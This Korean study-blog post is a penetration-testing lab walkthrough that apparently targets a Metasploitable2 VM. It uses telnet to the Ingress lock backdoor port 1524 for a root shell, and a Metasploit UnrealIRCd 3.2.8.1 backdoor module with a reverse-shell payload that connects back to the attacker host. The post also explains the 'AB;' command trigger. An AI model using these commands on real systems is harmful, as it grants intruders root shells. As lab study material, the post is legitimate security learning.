Study Record

[모의해킹 시스템 취약점] Ingress lock 백도어 / UnreadlRCd 백도어 취약점 본문

모의해킹

[모의해킹 시스템 취약점] Ingress lock 백도어 / UnreadlRCd 백도어 취약점

초코초코초코 2021. 11. 13. 17:45
728x90

1. Ingress lock 백도어

☞ 개요

Ingress 데이터 베이스에 Lock 서비스용 1524포트가 존재한다.

 

 공격 실습

 

공격자(KaliLinux) : 192.168.10.50

공격 대상 : 192.168.10.134

 

[KaliLinux]

㉮ 공격대상 시스템 스캔한다.

# nmap -sV 192.168.10.134 -p 1524

㉯ 백도어 포트에 접속해본다.

# telnet 192.168.10.134 1524

root 계정으로 접속된 것을 볼 수 있다.

 

2. UnreadlRCd 백도어

※ unrealIRCd?

UnrealIRCd는 DreamForge 기반의 오픈소스 IRC 데몬이며, Unix 계열 또는 윈도우에서 사용할 수 있다. 1999년 5월쯤 UnrealIRCd 개발이 이래로 많은 새로운 기능이 추가 및 변경되었으며, 고급 보안 기능 및 버그 수정을 포함하고 있어서, 널리 사용되는 서버가 되었다.

 

 개요

Metasploitable2 서버에서 UnrealIRCD IRC 데몬은 6667 포트에서 동작하고 있다. 설치된 이 버전에는 몇 달 동안 알려지지 않은 백도어가 들어 있다. 서버의 모든 리슨 포트(listening port)에  "AB" 문자 다음에 서버에 시스템 명령어를 보냄으로써 트러거된다. 메타스플로잇은 대화형 쉘을 얻을 수 있도록 할 수 있는 exploit module이 있다. 이 백도어는 2009년 11월에서 2010년 6월12일까지의 Unreal3.2.8.1.tar.gz 아카이브에 존재한다.

 

 공격 실습

→ msfconsole 에 exploit/unix/irc/unreal_ircd_3281_backdoor 모듈로 존재한다.

 

공격자(KaliLinux) : 192.168.10.50

공격 대상 : 192.168.10.134

 

[KaliLinux]

㉮ 공격대상 시스템 스캔한다.

# nmap -p 1-65535 -T4 -A -v 192.168.10.134

㉯ msfconsole 로 공격을 시도한다.

# msfconsole -q

msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > set RHOSTS 192.168.10.134

msf6 > set payload cmd/unix/reverse

msf6 > set LHOST 192.168.10.50

msf6 > run

㉰ wireshark 로 분석한 결과 IRC로 요청을 보낼때 "AB;" 뒤에 실행하고 싶은 프로그램을 적어 보낼 수 있다.

- "telnet 192.168.10.50 4444" 로 접속하는 프로그램 

 

728x90